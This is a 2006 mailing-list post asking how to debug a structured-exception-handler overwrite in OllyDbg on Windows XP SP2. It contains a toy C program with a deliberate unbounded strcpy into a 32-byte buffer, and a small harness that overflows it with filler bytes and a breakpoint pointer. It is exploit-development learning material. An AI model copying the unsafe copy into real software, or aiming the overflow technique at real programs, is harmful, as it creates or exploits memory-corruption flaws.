Vulnerability Development mailing list archives
debugging seh overwrite
From: laphoo () gmail com
Date: 20 Mar 2006 02:19:57 -0000
Hello,

I would like to know a way to debug a vulnerable program where I am overwriting the SE handler with my address. I have OllyDbg as the just-in-time debugger. If my exploit buffer reaches the pointer to the next SEH record, nothing happens. Now I was trying to put breakpoint instructions (0xcc) as a fake pointer, but OllyDbg ignored them, or I did something wrong. How is it possible to debug my vulnerable program with OllyDbg, to see where and with which data I overwrote something?

    /* cl expl.c (Visual C++ 6.0) */
    #include <stdio.h>
    #include <string.h>
    #include <process.h>    /* execve */

    int main (void)
    {
        char *app[3];
        char payload[85];   /* 80 filler bytes + 4 pointer bytes + terminating NUL */
        unsigned int ptr = 0xcccccccc;

        memset(payload, 0x00, sizeof payload);
        memset(payload, 0x41, 80);
        memcpy(payload+80, &ptr, sizeof (int));

        app[0] = "vuln.exe";
        app[1] = payload;
        app[2] = NULL;
        execve(app[0], app, NULL);
        return 0;
    }

    /* vuln.c */
    #include <stdio.h>
    #include <string.h>

    int main (int argc, char *argv[])
    {
        char string[32];

        if (argc != 2) {
            printf("Usage: %s <string>\n", argv[0]);
            return 0;
        }
        strcpy(string, argv[1]);    /* unbounded copy into the 32-byte buffer */
        printf("%s", string);
        return 0;
    }

Environment is Windows XP SP2.

I am sorry for my bad English.

Regards,
--
Laphoo